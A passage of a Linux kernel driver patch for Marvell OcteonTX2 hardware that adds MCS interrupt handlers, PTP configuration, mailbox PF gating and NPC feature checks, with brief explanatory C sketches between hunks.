+ #define MCS_BBE_INT_MASK		0xFFULL
+ 
+-#define MCS_MAX_PAB_INT			4ULL
+-#define MCS_PAB_INT_MASK		0xFULL
++#define MCS_MAX_PAB_INT		8ULL
++#define MCS_PAB_INT_MASK	0xFULL
+ 
+ #define MCS_BBE_RX_INT_ENA		BIT_ULL(0)
+ #define MCS_BBE_TX_INT_ENA		BIT_ULL(1)
+@@ -137,6 +128,7 @@ struct hwinfo {
+ 	u8 lmac_cnt;
+ 	u8 mcs_blks;
+ 	unsigned long	lmac_bmap; /* bitmap of enabled mcs lmac */
++	u16 ip_vec;
+ };
+ 
+ struct mcs {
+@@ -165,6 +157,8 @@ struct mcs_ops {
+ 	void	(*mcs_tx_sa_mem_map_write)(struct mcs *mcs, struct mcs_tx_sc_sa_map *map);
+ 	void	(*mcs_rx_sa_mem_map_write)(struct mcs *mcs, struct mcs_rx_sc_sa_map *map);
+ 	void	(*mcs_flowid_secy_map)(struct mcs *mcs, struct secy_mem_map *map, int dir);
++	void	(*mcs_bbe_intr_handler)(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++	void	(*mcs_pab_intr_handler)(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ };
+ 
+ extern struct pci_driver mcs_driver;
+@@ -219,6 +213,8 @@ void cn10kb_mcs_tx_sa_mem_map_write(struct mcs *mcs, struct mcs_tx_sc_sa_map *ma
+ void cn10kb_mcs_flowid_secy_map(struct mcs *mcs, struct secy_mem_map *map, int dir);
+ void cn10kb_mcs_rx_sa_mem_map_write(struct mcs *mcs, struct mcs_rx_sc_sa_map *map);
+ void cn10kb_mcs_parser_cfg(struct mcs *mcs);
++void cn10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++void cn10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ 
+ /* CNF10K-B APIs */
+ struct mcs_ops *cnf10kb_get_mac_ops(void);
+@@ -229,6 +225,8 @@ void cnf10kb_mcs_rx_sa_mem_map_write(struct mcs *mcs, struct mcs_rx_sc_sa_map *m
+ void cnf10kb_mcs_parser_cfg(struct mcs *mcs);
+ void cnf10kb_mcs_tx_pn_thresh_reached_handler(struct mcs *mcs);
+ void cnf10kb_mcs_tx_pn_wrapped_handler(struct mcs *mcs);
++void cnf10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++void cnf10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ 
+ /* Stats APIs */
+ void mcs_get_sc_stats(struct mcs *mcs, struct mcs_sc_stats *stats, int id, int dir);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
+index 7b62054144286..9f9b904ab2cd0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
+@@ -13,6 +13,8 @@ static struct mcs_ops cnf10kb_mcs_ops   = {
+ 	.mcs_tx_sa_mem_map_write	= cnf10kb_mcs_tx_sa_mem_map_write,
+ 	.mcs_rx_sa_mem_map_write	= cnf10kb_mcs_rx_sa_mem_map_write,
+ 	.mcs_flowid_secy_map		= cnf10kb_mcs_flowid_secy_map,
++	.mcs_bbe_intr_handler		= cnf10kb_mcs_bbe_intr_handler,
++	.mcs_pab_intr_handler		= cnf10kb_mcs_pab_intr_handler,
+ };
+ 
+ struct mcs_ops *cnf10kb_get_mac_ops(void)
+@@ -31,6 +33,7 @@ void cnf10kb_mcs_set_hw_capabilities(struct mcs *mcs)
+ 	hw->lmac_cnt = 4;		/* lmacs/ports per mcs block */
+ 	hw->mcs_x2p_intf = 1;		/* x2p calibration intf */
+ 	hw->mcs_blks = 7;		/* MCS blocks */
++	hw->ip_vec = MCS_CNF10KB_INT_VEC_IP; /* IP vector */
+ }
+ 
+ void cnf10kb_mcs_parser_cfg(struct mcs *mcs)
+@@ -212,3 +215,63 @@ void cnf10kb_mcs_tx_pn_wrapped_handler(struct mcs *mcs)
+ 		mcs_add_intr_wq_entry(mcs, &event);
+ 	}
+ }
++
++void cnf10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr,
++				  enum mcs_direction dir)
++{
++	struct mcs_intr_event event = { 0 };
++	int i;
++
++	if (!(intr & MCS_BBE_INT_MASK))
++		return;
++
++	event.mcs_id = mcs->mcs_id;
++	event.pcifunc = mcs->pf_map[0];
++
++	for (i = 0; i < MCS_MAX_BBE_INT; i++) {
++		if (!(intr & BIT_ULL(i)))
++			continue;
++
++		/* Lower nibble denotes data fifo overflow interrupts and
++		 * upper nibble indicates policy fifo overflow interrupts.
++		 */
++		if (intr & 0xFULL)
++			event.intr_mask = (dir == MCS_RX) ?
++					  MCS_BBE_RX_DFIFO_OVERFLOW_INT :
++					  MCS_BBE_TX_DFIFO_OVERFLOW_INT;
++		else
++			event.intr_mask = (dir == MCS_RX) ?
++					  MCS_BBE_RX_PLFIFO_OVERFLOW_INT :
++					  MCS_BBE_TX_PLFIFO_OVERFLOW_INT;
++
++		/* Notify which lmac_id ran into the BBE fatal error */
++		event.lmac_id = i & 0x3ULL;
++		mcs_add_intr_wq_entry(mcs, &event);
++	}
++}
++
++void cnf10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr,
++				  enum mcs_direction dir)
++{
++	struct mcs_intr_event event = { 0 };
++	int i;
++
++	if (!(intr & MCS_PAB_INT_MASK))
++		return;
++
++	event.mcs_id = mcs->mcs_id;
++	event.pcifunc = mcs->pf_map[0];
++
++	for (i = 0; i < MCS_MAX_PAB_INT; i++) {
++		if (!(intr & BIT_ULL(i)))
++			continue;
++
++		event.intr_mask = (dir == MCS_RX) ?
++				  MCS_PAB_RX_CHAN_OVERFLOW_INT :
++				  MCS_PAB_TX_CHAN_OVERFLOW_INT;
++
++		/* Notify which lmac_id ran into the PAB fatal error */
++		event.lmac_id = i;
++		mcs_add_intr_wq_entry(mcs, &event);
++	}
++}
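
The two handlers above decode one interrupt bit per LMAC. For the BBE case the comment fixes the layout: bits 0-3 are data-FIFO overflows and bits 4-7 policy-FIFO overflows, with the LMAC recovered as i & 0x3 (note the in-kernel loop tests the whole low nibble at once rather than bit i). A minimal userspace sketch of that per-bit decode, with printf standing in for mcs_add_intr_wq_entry and an illustrative sample value:

#include <stdint.h>
#include <stdio.h>

#define BBE_INT_MASK 0xFFull

/* Decode a CNF10K-B BBE interrupt word per the layout in the comment
 * above: low nibble = data FIFO, high nibble = policy FIFO, one bit
 * per LMAC within each nibble.
 */
static void classify_bbe(uint64_t intr)
{
	int i;

	if (!(intr & BBE_INT_MASK))
		return;

	for (i = 0; i < 8; i++) {
		if (!(intr & (1ull << i)))
			continue;
		printf("lmac %d: %s FIFO overflow\n", i & 0x3,
		       i < 4 ? "data" : "policy");
	}
}

int main(void)
{
	classify_bbe(0x12); /* bit 1 -> data/lmac1, bit 4 -> policy/lmac0 */
	return 0;
}
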
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+index c95a8b8f5eaf7..f3ab01fc363c8 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+@@ -97,6 +97,7 @@
+ #define MCSX_PEX_TX_SLAVE_VLAN_CFGX(a)          (0x46f8ull + (a) * 0x8ull)
+ #define MCSX_PEX_TX_SLAVE_CUSTOM_TAG_REL_MODE_SEL(a)	(0x788ull + (a) * 0x8ull)
+ #define MCSX_PEX_TX_SLAVE_PORT_CONFIG(a)		(0x4738ull + (a) * 0x8ull)
++#define MCSX_PEX_RX_SLAVE_PORT_CFGX(a)		(0x3b98ull + (a) * 0x8ull)
+ #define MCSX_PEX_RX_SLAVE_RULE_ETYPE_CFGX(a) ({	\
+ 	u64 offset;					\
+ 							\
+@@ -275,7 +276,10 @@
+ #define MCSX_BBE_RX_SLAVE_CAL_ENTRY			0x180ull
+ #define MCSX_BBE_RX_SLAVE_CAL_LEN			0x188ull
+ #define MCSX_PAB_RX_SLAVE_FIFO_SKID_CFGX(a)		(0x290ull + (a) * 0x40ull)
+-
++#define MCSX_BBE_RX_SLAVE_DFIFO_OVERFLOW_0		0xe20
++#define MCSX_BBE_TX_SLAVE_DFIFO_OVERFLOW_0		0x1298
++#define MCSX_BBE_RX_SLAVE_PLFIFO_OVERFLOW_0		0xe40
++#define MCSX_BBE_TX_SLAVE_PLFIFO_OVERFLOW_0		0x12b8
+ #define MCSX_BBE_RX_SLAVE_BBE_INT ({	\
+ 	u64 offset;			\
+ 					\
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+index eb25e458266ca..dfd23580e3b8e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+@@ -11,6 +11,7 @@
+ 
+ #include "mcs.h"
+ #include "rvu.h"
++#include "mcs_reg.h"
+ #include "lmac_common.h"
+ 
+ #define M(_name, _id, _fn_name, _req_type, _rsp_type)			\
+@@ -32,6 +33,42 @@ static struct _req_type __maybe_unused					\
+ MBOX_UP_MCS_MESSAGES
+ #undef M
+ 
++void rvu_mcs_ptp_cfg(struct rvu *rvu, u8 rpm_id, u8 lmac_id, bool ena)
++{
++	struct mcs *mcs;
++	u64 cfg;
++	u8 port;
++
++	if (!rvu->mcs_blk_cnt)
++		return;
++
++	/* When PTP is enabled, RPM appends an 8B header to all
++	 * RX packets. The MCS PEX block needs to be configured
++	 * to skip these 8B during packet parsing.
++	 */
++
++	/* CNF10K-B */
++	if (rvu->mcs_blk_cnt > 1) {
++		mcs = mcs_get_pdata(rpm_id);
++		cfg = mcs_reg_read(mcs, MCSX_PEX_RX_SLAVE_PEX_CONFIGURATION);
++		if (ena)
++			cfg |= BIT_ULL(lmac_id);
++		else
++			cfg &= ~BIT_ULL(lmac_id);
++		mcs_reg_write(mcs, MCSX_PEX_RX_SLAVE_PEX_CONFIGURATION, cfg);
++		return;
++	}
++	/* CN10KB */
++	mcs = mcs_get_pdata(0);
++	port = (rpm_id * rvu->hw->lmac_per_cgx) + lmac_id;
++	cfg = mcs_reg_read(mcs, MCSX_PEX_RX_SLAVE_PORT_CFGX(port));
++	if (ena)
++		cfg |= BIT_ULL(0);
++	else
++		cfg &= ~BIT_ULL(0);
++	mcs_reg_write(mcs, MCSX_PEX_RX_SLAVE_PORT_CFGX(port), cfg);
++}
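
rvu_mcs_ptp_cfg() above selects between two register layouts: on CNF10K-B each MCS block keeps one PTP-skip enable bit per LMAC in its PEX configuration register, while on CN10KB a single block keeps bit 0 of a per-port register, with port = rpm_id * lmac_per_cgx + lmac_id. A small userspace model of that selection; register storage is faked with plain variables and 4 LMACs per CGX is an assumed value:

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define LMACS_PER_CGX 4 /* assumed for illustration */

static uint64_t cnf10kb_pex_cfg;     /* one enable bit per LMAC */
static uint64_t cn10kb_port_cfg[32]; /* bit 0 per port          */

static void ptp_cfg(bool cnf10kb, int rpm_id, int lmac_id, bool ena)
{
	int port;

	if (cnf10kb) { /* per-block register, per-LMAC bit */
		if (ena)
			cnf10kb_pex_cfg |= 1ull << lmac_id;
		else
			cnf10kb_pex_cfg &= ~(1ull << lmac_id);
		return;
	}
	/* CN10KB: per-port register, bit 0 */
	port = rpm_id * LMACS_PER_CGX + lmac_id;
	if (ena)
		cn10kb_port_cfg[port] |= 1ull;
	else
		cn10kb_port_cfg[port] &= ~1ull;
}

int main(void)
{
	ptp_cfg(false, 2, 1, true); /* CN10KB port 2*4+1 = 9 */
	printf("port9 cfg = %llu\n", (unsigned long long)cn10kb_port_cfg[9]);
	return 0;
}
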
++
+ int rvu_mbox_handler_mcs_set_lmac_mode(struct rvu *rvu,
+ 				       struct mcs_set_lmac_mode *req,
+ 				       struct msg_rsp *rsp)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/npc.h b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+index f187293e3e084..d027c23b8ef8e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/npc.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/npc.h
+@@ -620,6 +620,7 @@ struct rvu_npc_mcam_rule {
+ 	bool vfvlan_cfg;
+ 	u16 chan;
+ 	u16 chan_mask;
++	u8 lxmb;
+ };
+ 
+ #endif /* NPC_H */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index 3f5e09b77d4bd..873f081c030de 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -2274,7 +2274,7 @@ static inline void rvu_afvf_mbox_up_handler(struct work_struct *work)
+ }
+ 
+ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+-				int num, int type)
++				int num, int type, unsigned long *pf_bmap)
+ {
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	int region;
+@@ -2286,6 +2286,9 @@ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+ 	 */
+ 	if (type == TYPE_AFVF) {
+ 		for (region = 0; region < num; region++) {
++			if (!test_bit(region, pf_bmap))
++				continue;
++
+ 			if (hw->cap.per_pf_mbox_regs) {
+ 				bar4 = rvu_read64(rvu, BLKADDR_RVUM,
+ 						  RVU_AF_PFX_BAR4_ADDR(0)) +
+@@ -2307,6 +2310,9 @@ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+ 	 * RVU_AF_PF_BAR4_ADDR register.
+ 	 */
+ 	for (region = 0; region < num; region++) {
++		if (!test_bit(region, pf_bmap))
++			continue;
++
+ 		if (hw->cap.per_pf_mbox_regs) {
+ 			bar4 = rvu_read64(rvu, BLKADDR_RVUM,
+ 					  RVU_AF_PFX_BAR4_ADDR(region));
+@@ -2335,20 +2341,41 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 	int err = -EINVAL, i, dir, dir_up;
+ 	void __iomem *reg_base;
+ 	struct rvu_work *mwork;
++	unsigned long *pf_bmap;
+ 	void **mbox_regions;
+ 	const char *name;
++	u64 cfg;
+ 
+-	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
+-	if (!mbox_regions)
++	pf_bmap = bitmap_zalloc(num, GFP_KERNEL);
++	if (!pf_bmap)
+ 		return -ENOMEM;
+ 
++	/* RVU VFs */
++	if (type == TYPE_AFVF)
++		bitmap_set(pf_bmap, 0, num);
++
++	if (type == TYPE_AFPF) {
++		/* Mark enabled PFs in bitmap */
++		for (i = 0; i < num; i++) {
++			cfg = rvu_read64(rvu, BLKADDR_RVUM, RVU_PRIV_PFX_CFG(i));
++			if (cfg & BIT_ULL(20))
++				set_bit(i, pf_bmap);
++		}
++	}
++
++	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
++	if (!mbox_regions) {
++		err = -ENOMEM;
++		goto free_bitmap;
++	}
++
+ 	switch (type) {
+ 	case TYPE_AFPF:
+ 		name = "rvu_afpf_mailbox";
+ 		dir = MBOX_DIR_AFPF;
+ 		dir_up = MBOX_DIR_AFPF_UP;
+ 		reg_base = rvu->afreg_base;
+-		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFPF);
++		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFPF, pf_bmap);
+ 		if (err)
+ 			goto free_regions;
+ 		break;
+@@ -2357,7 +2384,7 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		dir = MBOX_DIR_PFVF;
+ 		dir_up = MBOX_DIR_PFVF_UP;
+ 		reg_base = rvu->pfreg_base;
+-		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFVF);
++		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFVF, pf_bmap);
+ 		if (err)
+ 			goto free_regions;
+ 		break;
+@@ -2388,16 +2415,19 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 	}
+ 
+ 	err = otx2_mbox_regions_init(&mw->mbox, mbox_regions, rvu->pdev,
+-				     reg_base, dir, num);
++				     reg_base, dir, num, pf_bmap);
+ 	if (err)
+ 		goto exit;
+ 
+ 	err = otx2_mbox_regions_init(&mw->mbox_up, mbox_regions, rvu->pdev,
+-				     reg_base, dir_up, num);
++				     reg_base, dir_up, num, pf_bmap);
+ 	if (err)
+ 		goto exit;
+ 
+ 	for (i = 0; i < num; i++) {
++		if (!test_bit(i, pf_bmap))
++			continue;
++
+ 		mwork = &mw->mbox_wrk[i];
+ 		mwork->rvu = rvu;
+ 		INIT_WORK(&mwork->work, mbox_handler);
+@@ -2406,8 +2436,7 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		mwork->rvu = rvu;
+ 		INIT_WORK(&mwork->work, mbox_up_handler);
+ 	}
+-	kfree(mbox_regions);
+-	return 0;
++	goto free_regions;
+ 
+ exit:
+ 	destroy_workqueue(mw->mbox_wq);
+@@ -2416,6 +2445,8 @@ unmap_regions:
+ 		iounmap((void __iomem *)mbox_regions[num]);
+ free_regions:
+ 	kfree(mbox_regions);
++free_bitmap:
++	bitmap_free(pf_bmap);
+ 	return err;
+ }
+ 
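
The hunk above makes every per-PF mailbox resource conditional on a new enable bitmap built from bit 20 of each PF's RVU_PRIV_PFX_CFG word: disabled PFs get neither a mapped region nor a work item. A standalone sketch of that gating, with the config reads faked as an array:

#include <stdint.h>
#include <stdio.h>

#define NUM_PF 8

/* fake RVU_PRIV_PFX_CFG reads; PFs 0, 2 and 5 are enabled */
static uint64_t priv_pfx_cfg[NUM_PF] = {
	[0] = 1ull << 20, [2] = 1ull << 20, [5] = 1ull << 20,
};

int main(void)
{
	uint64_t pf_bmap = 0;
	int i;

	for (i = 0; i < NUM_PF; i++)
		if (priv_pfx_cfg[i] & (1ull << 20))
			pf_bmap |= 1ull << i;

	for (i = 0; i < NUM_PF; i++) {
		if (!(pf_bmap & (1ull << i)))
			continue; /* skipped: no region mapped, no work queued */
		printf("PF%d: map mbox region + init work\n", i);
	}
	return 0;
}
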
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index b07c6f51b461b..d493b533cf76e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -851,6 +851,7 @@ int npc_install_mcam_drop_rule(struct rvu *rvu, int mcam_idx, u16 *counter_idx,
+ 			       u64 chan_val, u64 chan_mask, u64 exact_val, u64 exact_mask,
+ 			       u64 bcast_mcast_val, u64 bcast_mcast_mask);
+ void npc_mcam_rsrcs_reserve(struct rvu *rvu, int blkaddr, int entry_idx);
++bool npc_is_feature_supported(struct rvu *rvu, u64 features, u8 intf);
+ 
+ /* CPT APIs */
+ int rvu_cpt_register_interrupts(struct rvu *rvu);
+@@ -892,6 +893,7 @@ int rvu_get_hwvf(struct rvu *rvu, int pcifunc);
+ /* CN10K MCS */
+ int rvu_mcs_init(struct rvu *rvu);
+ int rvu_mcs_flr_handler(struct rvu *rvu, u16 pcifunc);
++void rvu_mcs_ptp_cfg(struct rvu *rvu, u8 rpm_id, u8 lmac_id, bool ena);
+ void rvu_mcs_exit(struct rvu *rvu);
+ 
+ #endif /* RVU_H */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index addc69f4b65c6..9eca38547b783 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -761,6 +761,8 @@ static int rvu_cgx_ptp_rx_cfg(struct rvu *rvu, u16 pcifunc, bool enable)
+ 	/* This flag is required to clean up CGX conf if app gets killed */
+ 	pfvf->hw_rx_tstamp_en = enable;
+ 
++	/* Inform MCS about 8B RX header */
++	rvu_mcs_ptp_cfg(rvu, cgx_id, lmac_id, enable);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
+index 7dbbc115cde42..f9faa5b23bb9d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
+@@ -60,13 +60,14 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 			   u64 iova, u64 *lmt_addr)
+ {
+ 	u64 pa, val, pf;
+-	int err;
++	int err = 0;
+ 
+ 	if (!iova) {
+ 		dev_err(rvu->dev, "%s Requested Null address for transulation\n", __func__);
+ 		return -EINVAL;
+ 	}
+ 
++	mutex_lock(&rvu->rsrc_lock);
+ 	rvu_write64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_REQ, iova);
+ 	pf = rvu_get_pf(pcifunc) & 0x1F;
+ 	val = BIT_ULL(63) | BIT_ULL(14) | BIT_ULL(13) | pf << 8 |
+@@ -76,12 +77,13 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 	err = rvu_poll_reg(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_RSP_STS, BIT_ULL(0), false);
+ 	if (err) {
+ 		dev_err(rvu->dev, "%s LMTLINE iova transulation failed\n", __func__);
+-		return err;
++		goto exit;
+ 	}
+ 	val = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_RSP_STS);
+ 	if (val & ~0x1ULL) {
+ 		dev_err(rvu->dev, "%s LMTLINE iova transulation failed err:%llx\n", __func__, val);
+-		return -EIO;
++		err = -EIO;
++		goto exit;
+ 	}
+ 	/* PA[51:12] = RVU_AF_SMMU_TLN_FLIT0[57:18]
+ 	 * PA[11:0] = IOVA[11:0]
+@@ -89,8 +91,9 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 	pa = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_TLN_FLIT0) >> 18;
+ 	pa &= GENMASK_ULL(39, 0);
+ 	*lmt_addr = (pa << 12) | (iova  & 0xFFF);
+-
+-	return 0;
++exit:
++	mutex_unlock(&rvu->rsrc_lock);
++	return err;
+ }
+ 
+ static int rvu_update_lmtaddr(struct rvu *rvu, u16 pcifunc, u64 lmt_addr)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index abef0fd4259a3..aadc352c2ffbd 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -497,8 +497,9 @@ static int rvu_dbg_mcs_rx_secy_stats_display(struct seq_file *filp, void *unused
+ 			   stats.octet_validated_cnt);
+ 		seq_printf(filp, "secy%d: Pkts on disable port: %lld\n", secy_id,
+ 			   stats.pkt_port_disabled_cnt);
+-		seq_printf(filp, "secy%d: Octets validated: %lld\n", secy_id, stats.pkt_badtag_cnt);
+-		seq_printf(filp, "secy%d: Octets validated: %lld\n", secy_id, stats.pkt_nosa_cnt);
++		seq_printf(filp, "secy%d: Pkts with badtag: %lld\n", secy_id, stats.pkt_badtag_cnt);
++		seq_printf(filp, "secy%d: Pkts with no SA(sectag.tci.c=0): %lld\n", secy_id,
++			   stats.pkt_nosa_cnt);
+ 		seq_printf(filp, "secy%d: Pkts with nosaerror: %lld\n", secy_id,
+ 			   stats.pkt_nosaerror_cnt);
+ 		seq_printf(filp, "secy%d: Tagged ctrl pkts: %lld\n", secy_id,
+@@ -2758,6 +2759,12 @@ static void rvu_dbg_npc_mcam_show_flows(struct seq_file *s,
+ 	for_each_set_bit(bit, (unsigned long *)&rule->features, 64) {
+ 		seq_printf(s, "\t%s  ", npc_get_field_name(bit));
+ 		switch (bit) {
++		case NPC_LXMB:
++			if (rule->lxmb == 1)
++				seq_puts(s, "\tL2M nibble is set\n");
++			else
++				seq_puts(s, "\tL2B nibble is set\n");
++			break;
+ 		case NPC_DMAC:
+ 			seq_printf(s, "%pM ", rule->packet.dmac);
+ 			seq_printf(s, "mask %pM\n", rule->mask.dmac);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+index 1e348fd0d930e..16cfc802e348d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc.c
+@@ -617,6 +617,12 @@ void rvu_npc_install_ucast_entry(struct rvu *rvu, u16 pcifunc,
+ 	if (blkaddr < 0)
+ 		return;
+ 
++	/* Ucast rule should not be installed if DMAC
++	 * extraction is not supported by the profile.
++	 */
++	if (!npc_is_feature_supported(rvu, BIT_ULL(NPC_DMAC), pfvf->nix_rx_intf))
++		return;
++
+ 	index = npc_get_nixlf_mcam_index(mcam, pcifunc,
+ 					 nixlf, NIXLF_UCAST_ENTRY);
+ 
+@@ -778,6 +784,14 @@ void rvu_npc_install_bcast_match_entry(struct rvu *rvu, u16 pcifunc,
+ 	/* Get 'pcifunc' of PF device */
+ 	pcifunc = pcifunc & ~RVU_PFVF_FUNC_MASK;
+ 	pfvf = rvu_get_pfvf(rvu, pcifunc);
++
++	/* Bcast rule should not be installed if neither DMAC
++	 * nor LXMB extraction is supported by the profile.
++	 */
++	if (!npc_is_feature_supported(rvu, BIT_ULL(NPC_DMAC), pfvf->nix_rx_intf) &&
++	    !npc_is_feature_supported(rvu, BIT_ULL(NPC_LXMB), pfvf->nix_rx_intf))
++		return;
++
+ 	index = npc_get_nixlf_mcam_index(mcam, pcifunc,
+ 					 nixlf, NIXLF_BCAST_ENTRY);
+ 
+@@ -848,6 +862,14 @@ void rvu_npc_install_allmulti_entry(struct rvu *rvu, u16 pcifunc, int nixlf,
+ 	vf_func = pcifunc & RVU_PFVF_FUNC_MASK;
+ 	pcifunc = pcifunc & ~RVU_PFVF_FUNC_MASK;
+ 	pfvf = rvu_get_pfvf(rvu, pcifunc);
++
++	/* Mcast rule should not be installed if neither DMAC
++	 * nor LXMB extraction is supported by the profile.
++	 */
++	if (!npc_is_feature_supported(rvu, BIT_ULL(NPC_DMAC), pfvf->nix_rx_intf) &&
++	    !npc_is_feature_supported(rvu, BIT_ULL(NPC_LXMB), pfvf->nix_rx_intf))
++		return;
++
+ 	index = npc_get_nixlf_mcam_index(mcam, pcifunc,
+ 					 nixlf, NIXLF_ALLMULTI_ENTRY);
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+index 7c4e1acd0f77b..1eb5eb29a2ba6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+@@ -13,11 +13,6 @@
+ #include "rvu_npc_fs.h"
+ #include "rvu_npc_hash.h"
+ 
+-#define NPC_BYTESM		GENMASK_ULL(19, 16)
+-#define NPC_HDR_OFFSET		GENMASK_ULL(15, 8)
+-#define NPC_KEY_OFFSET		GENMASK_ULL(5, 0)
+-#define NPC_LDATA_EN		BIT_ULL(7)
+-
+ static const char * const npc_flow_names[] = {
+ 	[NPC_DMAC]	= "dmac",
+ 	[NPC_SMAC]	= "smac",
+@@ -43,9 +38,23 @@ static const char * const npc_flow_names[] = {
+ 	[NPC_DPORT_UDP]	= "udp destination port",
+ 	[NPC_SPORT_SCTP] = "sctp source port",
+ 	[NPC_DPORT_SCTP] = "sctp destination port",
++	[NPC_LXMB]	= "Mcast/Bcast header ",
+ 	[NPC_UNKNOWN]	= "unknown",
+ };
+ 
++bool npc_is_feature_supported(struct rvu *rvu, u64 features, u8 intf)
++{
++	struct npc_mcam *mcam = &rvu->hw->mcam;
++	u64 mcam_features;
++	u64 unsupported;
++
++	mcam_features = is_npc_intf_tx(intf) ? mcam->tx_features : mcam->rx_features;
++	unsupported = (mcam_features ^ features) & ~mcam_features;
++
++	/* Return false if at least one of the input flows is not extracted */
++	return !unsupported;
++}
++
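
npc_is_feature_supported() above hinges on one bit identity: (mcam ^ req) & ~mcam equals req & ~mcam, i.e. exactly the requested feature bits that the profile does not extract. A worked standalone example:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint64_t mcam_features = 0x0bull; /* profile extracts bits 0, 1, 3 */
	uint64_t features      = 0x09ull; /* caller wants bits 0, 3        */
	uint64_t unsupported   = (mcam_features ^ features) & ~mcam_features;

	printf("unsupported = 0x%llx\n", (unsigned long long)unsupported); /* 0x0 */

	features = 0x14ull; /* bits 2 and 4: neither is extracted */
	unsupported = (mcam_features ^ features) & ~mcam_features;
	printf("unsupported = 0x%llx\n", (unsigned long long)unsupported); /* 0x14 */
	return 0;
}
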
+ const char *npc_get_field_name(u8 hdr)
+ {
+ 	if (hdr >= ARRAY_SIZE(npc_flow_names))
+@@ -340,8 +349,10 @@ static void npc_handle_multi_layer_fields(struct rvu *rvu, int blkaddr, u8 intf)
